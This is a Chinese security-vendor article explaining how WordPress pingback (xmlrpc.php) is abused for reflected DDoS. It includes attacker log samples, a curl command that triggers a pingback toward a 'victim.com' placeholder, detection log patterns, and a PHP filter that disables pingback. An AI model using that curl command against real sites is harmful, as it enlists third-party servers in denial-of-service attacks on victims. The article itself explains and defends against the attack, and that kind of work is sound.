关于冰盾 | 使用条款 | 网站地图
 
超过16W的WordPress网站被用来做DDoS攻击
超过16W的WordPress网站被用来做DDoS攻击
作者:冰盾防火墙 网站:www.bingdun.com 日期:2015-02-04
 

任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。

超过16W的WordPress网站被用来做DDoS攻击

看如下日志:

574.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com" 121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" ..

可以发现每次请求还增加了随机数/?3162504=9747583以此来绕过缓存。

测试这种攻击方式只需要一个curl命令就可以了:

$ curl -D - "www.anywordpresssite.com/xmlrpc.php" -d 'pingback.pinghttp://victim.comwww.anywordpresssite.com/postchosen'

想要看你自己的网站是否被用来做了攻击可以查看日志当中是否包含类似如下的内容:

393.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://fastbet99.com/?1698491=8940641\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A" 94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

防御此问题的推荐方法需要屏蔽 XML-RPC (pingback) 的功能,WordPress主题中添加如下代码:

add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } );
 

 
最新内容:
调查显示:多手段并用的DDoS攻击日益普遍[2015-02-04]
对抗模拟浏览器的DDoS攻击[2015-02-04]
NTP DDoS攻击激增 而SYN洪水攻击更具破环性[2015-02-04]
谁来帮助中小企业抵御超大规模DDoS攻击[2015-02-04]
四个真实案例 让你0距离触摸云安全[2015-02-04]
如何保障公共云计算彼端的数据安全[2015-02-04]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2016 冰盾防火墙  www.BingDun.com 法律声明
服务热线:(010)51661195